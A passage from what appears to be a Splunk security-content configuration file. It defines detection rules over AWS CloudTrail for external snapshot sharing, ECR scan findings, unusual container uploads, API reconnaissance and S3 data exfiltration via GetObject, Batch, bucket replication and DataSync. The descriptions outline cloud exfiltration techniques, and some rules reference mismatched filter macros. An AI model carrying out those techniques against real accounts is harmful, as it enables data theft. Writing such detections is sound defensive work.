values(requestParameters.bucketName) as bucket_name values(resources{}.ARN) as resource_arn by src_ip aws_account_id awsRegion eventName userAgent user_arn userIdentity.principalId errorCode | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `aws_disable_bucket_versioning_filter` [ESCU - AWS EC2 Snapshot Shared Externally - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes AWS CloudTrail events to identify when an EC2 snapshot permissions are modified to be shared with a different AWS account. This method is used by adversaries to exfiltrate the EC2 snapshot. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes AWS CloudTrail events to identify when an EC2 snapshot permissions are modified to be shared with a different AWS account. This method is used by adversaries to exfiltrate the EC2 snapshot. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = It is possible that an AWS admin has legitimately shared a snapshot with others for a specific purpose. action.escu.creation_date = 2023-03-20 action.escu.modification_date = 2023-03-20 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS EC2 Snapshot Shared Externally - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Suspicious Cloud Instance Activities", "Data Exfiltration"] action.risk = 1 action.risk.param._risk_message = AWS EC2 snapshot from account $aws_account_id$ is shared with $requested_account_id$ by user $user_arn$ from $src_ip$ action.risk.param._risk = [{"risk_object_field": "user_arn", "risk_object_type": "other", "risk_score": 48}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "aws_account_id", "risk_object_type": "other", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS EC2 Snapshot Shared Externally - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Instance Activities", "Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes AWS CloudTrail events to identify when an EC2 snapshot permissions are modified to be shared with a different AWS account. This method is used by adversaries to exfiltrate the EC2 snapshot. action.notable.param.rule_title = AWS EC2 Snapshot Shared Externally action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=ModifySnapshotAttribute | rename requestParameters.createVolumePermission.add.items{}.userId as requested_account_id | search requested_account_id != NULL | eval match=if(requested_account_id==aws_account_id,"Match","No Match") | table _time user_arn src_ip requestParameters.attributeType requested_account_id aws_account_id match vendor_region user_agent userIdentity.principalId | where match = "No Match" | `aws_ec2_snapshot_shared_externally_filter` [ESCU - AWS ECR Container Scanning Findings High - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). You need to activate image scanning in order to get the event DescribeImageScanFindings with the results. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). You need to activate image scanning in order to get the event DescribeImageScanFindings with the results. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-11-09 action.escu.modification_date = 2023-11-09 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS ECR Container Scanning Findings High - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = Vulnerabilities with severity high found in repository $repository$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 70}, {"risk_object_field": "repository", "risk_object_type": "other", "risk_score": 70}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS ECR Container Scanning Findings High - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 100, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). You need to activate image scanning in order to get the event DescribeImageScanFindings with the results. action.notable.param.rule_title = AWS ECR Container Scanning Findings High action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventSource=ecr.amazonaws.com eventName=DescribeImageScanFindings | spath path=responseElements.imageScanFindings.findings{} output=findings | mvexpand findings | spath input=findings | search severity=HIGH | rename name as finding_name, description as finding_description, requestParameters.imageId.imageDigest as imageDigest, requestParameters.repositoryName as repository, userIdentity.principalId as user | eval finding = finding_name.", ".finding_description | eval phase="release" | eval severity="high" | stats min(_time) as firstTime max(_time) as lastTime by awsRegion, eventName, eventSource, imageDigest, repository, user, src_ip, finding, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_ecr_container_scanning_findings_high_filter` [ESCU - AWS ECR Container Scanning Findings Low Informational Unknown - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). You need to activate image scanning in order to get the event DescribeImageScanFindings with the results. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). You need to activate image scanning in order to get the event DescribeImageScanFindings with the results. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-11-09 action.escu.modification_date = 2023-11-09 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS ECR Container Scanning Findings Low Informational Unknown - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = Vulnerabilities with severity $severity$ found in repository $repository$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 5}, {"risk_object_field": "repository", "risk_object_type": "other", "risk_score": 5}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS ECR Container Scanning Findings Low Informational Unknown - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 50, "impact": 10, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventSource=ecr.amazonaws.com eventName=DescribeImageScanFindings | spath path=responseElements.imageScanFindings.findings{} output=findings | mvexpand findings | spath input=findings| search severity IN ("LOW", "INFORMATIONAL", "UNKNOWN") | rename name as finding_name, description as finding_description, requestParameters.imageId.imageDigest as imageDigest, requestParameters.repositoryName as repository, userIdentity.principalId as user | eval finding = finding_name.", ".finding_description | eval phase="release" | eval severity="low" | stats min(_time) as firstTime max(_time) as lastTime by awsRegion, eventName, eventSource, imageDigest, repository, user, src_ip, finding, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_ecr_container_scanning_findings_low_informational_unknown_filter` [ESCU - AWS ECR Container Scanning Findings Medium - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). You need to activate image scanning in order to get the event DescribeImageScanFindings with the results. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). You need to activate image scanning in order to get the event DescribeImageScanFindings with the results. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-11-09 action.escu.modification_date = 2023-11-09 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS ECR Container Scanning Findings Medium - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = Vulnerabilities with severity $severity$ found in repository $repository$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 21}, {"risk_object_field": "repository", "risk_object_type": "other", "risk_score": 21}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS ECR Container Scanning Findings Medium - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 70, "impact": 30, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventSource=ecr.amazonaws.com eventName=DescribeImageScanFindings | spath path=responseElements.imageScanFindings.findings{} output=findings | mvexpand findings | spath input=findings| search severity=MEDIUM | rename name as finding_name, description as finding_description, requestParameters.imageId.imageDigest as imageDigest, requestParameters.repositoryName as repository, userIdentity.principalId as user| eval finding = finding_name.", ".finding_description | eval phase="release" | eval severity="medium" | stats min(_time) as firstTime max(_time) as lastTime by awsRegion, eventName, eventSource, imageDigest, repository, user, src_ip, finding, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_ecr_container_scanning_findings_medium_filter` [ESCU - AWS ECR Container Upload Outside Business Hours - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). A upload of a new container is normally done during business hours. When done outside business hours, we want to take a look into it. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). A upload of a new container is normally done during business hours. When done outside business hours, we want to take a look into it. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = When your development is spreaded in different time zones, applying this rule can be difficult. action.escu.creation_date = 2023-11-09 action.escu.modification_date = 2023-11-09 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS ECR Container Upload Outside Business Hours - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = Container uploaded outside business hours from $user$ action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS ECR Container Upload Outside Business Hours - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventSource=ecr.amazonaws.com eventName=PutImage date_hour>=20 OR date_hour<8 OR date_wday=saturday OR date_wday=sunday | rename requestParameters.* as * | rename repositoryName AS repository | eval phase="release" | eval severity="medium" | stats min(_time) as firstTime max(_time) as lastTime by awsRegion, eventName, eventSource, user, userName, src_ip, imageTag, registryId, repository, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_ecr_container_upload_outside_business_hours_filter` [ESCU - AWS ECR Container Upload Unknown User - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). A upload of a new container is normally done from only a few known users. When the user was never seen before, we should have a closer look into the event. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). A upload of a new container is normally done from only a few known users. When the user was never seen before, we should have a closer look into the event. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-08-19 action.escu.modification_date = 2021-08-19 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS ECR Container Upload Unknown User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = Container uploaded from unknown user $user$ action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS ECR Container Upload Unknown User - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventSource=ecr.amazonaws.com eventName=PutImage NOT `aws_ecr_users` | rename requestParameters.* as * | rename repositoryName AS image | eval phase="release" | eval severity="high" | stats min(_time) as firstTime max(_time) as lastTime by awsRegion, eventName, eventSource, user, userName, src_ip, imageTag, registryId, image, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_ecr_container_upload_unknown_user_filter` [ESCU - AWS Excessive Security Scanning - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for AWS CloudTrail events and analyse the amount of eventNames which starts with Describe by a single user. This indicates that this user scans the configuration of your AWS cloud environment. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events and analyse the amount of eventNames which starts with Describe by a single user. This indicates that this user scans the configuration of your AWS cloud environment. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = While this search has no known false positives. action.escu.creation_date = 2021-04-13 action.escu.modification_date = 2021-04-13 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Excessive Security Scanning - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS User Monitoring"] action.risk = 1 action.risk.param._risk_message = User $user$ has excessive number of api calls $dc_events$ from these IP addresses $src$, violating the threshold of 50, using the following commands $command$. action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 18}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Excessive Security Scanning - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS User Monitoring"], "cis20": ["CIS 13"], "confidence": 60, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for AWS CloudTrail events and analyse the amount of eventNames which starts with Describe by a single user. This indicates that this user scans the configuration of your AWS cloud environment. action.notable.param.rule_title = AWS Excessive Security Scanning action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=Describe* OR eventName=List* OR eventName=Get* | stats dc(eventName) as dc_events min(_time) as firstTime max(_time) as lastTime values(eventName) as command values(src) as src values(userAgent) as userAgent by user userIdentity.arn | where dc_events > 50 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`|`aws_excessive_security_scanning_filter` [ESCU - AWS Exfiltration via Anomalous GetObject API Activity - Rule] action.escu = 0 action.escu.enabled = 1 description = This search uses built in Splunk command `| anomalydetection` to detect anomalies with respect to users making high number of GetObject API calls to download objects from S3 in a 10 minute time window. The field `probable_cause` is the name of the field that best explains why the event is anomalous. This command identifies anomalous events by computing a probability for each GetObject event by "count" "user_type" "user_arn" and detects anomaly based on the frequencies. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1119"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search uses built in Splunk command `| anomalydetection` to detect anomalies with respect to users making high number of GetObject API calls to download objects from S3 in a 10 minute time window. The field `probable_cause` is the name of the field that best explains why the event is anomalous. This command identifies anomalous events by computing a probability for each GetObject event by "count" "user_type" "user_arn" and detects anomaly based on the frequencies. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = It is possible that a user downloaded these files to use them locally and there are AWS services in configured that perform these activities for a legitimate reason. Filter is needed. action.escu.creation_date = 2023-04-10 action.escu.modification_date = 2023-04-10 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Exfiltration via Anomalous GetObject API Activity - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Data Exfiltration"] action.risk = 1 action.risk.param._risk_message = Anomalous S3 activities detected by user $user_arn$ from $src_ip$ action.risk.param._risk = [{"risk_object_field": "user_arn", "risk_object_type": "other", "risk_score": 64}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "aws_account_id", "risk_object_type": "other", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Exfiltration via Anomalous GetObject API Activity - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1119"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=GetObject | bin _time span=10m | stats count values(requestParameters.bucketName) as bucketName by _time src_ip aws_account_id user_type user_arn userIdentity.principalId | anomalydetection "count" "user_type" "user_arn" action=annotate | search probable_cause=* |`aws_exfiltration_via_anomalous_getobject_api_activity_filter` [ESCU - AWS Exfiltration via Batch Service - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for events where AWS Batch Service is used for creating a job that could potentially abuse the AWS Bucket Replication feature on S3 buckets. This AWS service can used to transfer data between different AWS S3 buckets and an attacker can leverage this to exfiltrate data by creating a malicious batch job. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1119"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search looks for events where AWS Batch Service is used for creating a job that could potentially abuse the AWS Bucket Replication feature on S3 buckets. This AWS service can used to transfer data between different AWS S3 buckets and an attacker can leverage this to exfiltrate data by creating a malicious batch job. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = It is possible that an AWS Administrator or a user has legitimately created this job for some tasks. action.escu.creation_date = 2023-04-24 action.escu.modification_date = 2023-04-24 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Exfiltration via Batch Service - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Data Exfiltration"] action.risk = 1 action.risk.param._risk_message = AWS Batch Job is created on account id - $aws_account_id$ from src_ip $src_ip$ action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "aws_account_id", "risk_object_type": "other", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Exfiltration via Batch Service - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1119"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for events where AWS Batch Service is used for creating a job that could potentially abuse the AWS Bucket Replication feature on S3 buckets. This AWS service can used to transfer data between different AWS S3 buckets and an attacker can leverage this to exfiltrate data by creating a malicious batch job. action.notable.param.rule_title = AWS Exfiltration via Batch Service action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName = JobCreated | stats count min(_time) as firstTime max(_time) as lastTime values(serviceEventDetails.jobArn) as job_arn values(serviceEventDetails.status) as status by src_ip aws_account_id eventName errorCode userAgent| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_exfiltration_via_datasync_task_filter` [ESCU - AWS Exfiltration via Bucket Replication - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects API calls made to an S3 bucket when bucket replication services are enabled. S3 bucket replication is a feature offered by Amazon Web Services (AWS) that allows you to automatically and asynchronously copy data from one S3 bucket to another in the same or different region.\ S3 bucket replication can also be used for cross-account replication, where data is replicated from a source bucket owned by one AWS account to a destination bucket owned by a different AWS account. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects API calls made to an S3 bucket when bucket replication services are enabled. S3 bucket replication is a feature offered by Amazon Web Services (AWS) that allows you to automatically and asynchronously copy data from one S3 bucket to another in the same or different region.\ S3 bucket replication can also be used for cross-account replication, where data is replicated from a source bucket owned by one AWS account to a destination bucket owned by a different AWS account. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = It is possible that an AWS admin has legitimately implemented data replication to ensure data availability and improve data protection/backup strategies. action.escu.creation_date = 2023-04-28 action.escu.modification_date = 2023-04-28 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Exfiltration via Bucket Replication - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Suspicious AWS S3 Activities", "Data Exfiltration"] action.risk = 1 action.risk.param._risk_message = AWS Bucket Replication rule $rule$ added on $source_bucket$ to $destination_bucket$ by user $user_arn$ from IP Address - $src_ip$ action.risk.param._risk = [{"risk_object_field": "user_arn", "risk_object_type": "other", "risk_score": 64}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "aws_account_id", "risk_object_type": "other", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Exfiltration via Bucket Replication - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS S3 Activities", "Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects API calls made to an S3 bucket when bucket replication services are enabled. S3 bucket replication is a feature offered by Amazon Web Services (AWS) that allows you to automatically and asynchronously copy data from one S3 bucket to another in the same or different region.\ S3 bucket replication can also be used for cross-account replication, where data is replicated from a source bucket owned by one AWS account to a destination bucket owned by a different AWS account. action.notable.param.rule_title = AWS Exfiltration via Bucket Replication action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName = PutBucketReplication eventSource = s3.amazonaws.com | rename requestParameters.* as * | stats count values(bucketName) as source_bucket values(ReplicationConfiguration.Rule.ID) as rule_id values(ReplicationConfiguration.Rule.Destination.Bucket) as destination_bucket by _time user_arn userName user_type src_ip aws_account_id userIdentity.principalId user_agent | `aws_exfiltration_via_ec2_snapshot_filter` [ESCU - AWS Exfiltration via DataSync Task - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for potential misuse of an AWS service known as DataSync. This AWS service is used to transfer data between different AWS cloud storage services, such as Amazon S3, Amazon EFS, and Amazon FSx for Windows File Server. Attackers can create a task in AWS to periodically copy data from a private AWS location to a public location resulting in the compromise of the data. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1119"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search looks for potential misuse of an AWS service known as DataSync. This AWS service is used to transfer data between different AWS cloud storage services, such as Amazon S3, Amazon EFS, and Amazon FSx for Windows File Server. Attackers can create a task in AWS to periodically copy data from a private AWS location to a public location resulting in the compromise of the data. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = It is possible that an AWS Administrator has legitimately created this task for creating backup. Please check the `sourceLocationArn` and `destinationLocationArn` of this task action.escu.creation_date = 2023-04-10 action.escu.modification_date = 2023-04-10 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Exfiltration via DataSync Task - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Suspicious AWS S3 Activities", "Data Exfiltration"] action.risk = 1 action.risk.param._risk_message = DataSync task created on account id - $aws_account_id$ by user $user_arn$ from src_ip $src_ip$ action.risk.param._risk = [{"risk_object_field": "user_arn", "risk_object_type": "other", "risk_score": 64}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "aws_account_id", "risk_object_type": "other", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Exfiltration via DataSync Task - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS S3 Activities", "Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], 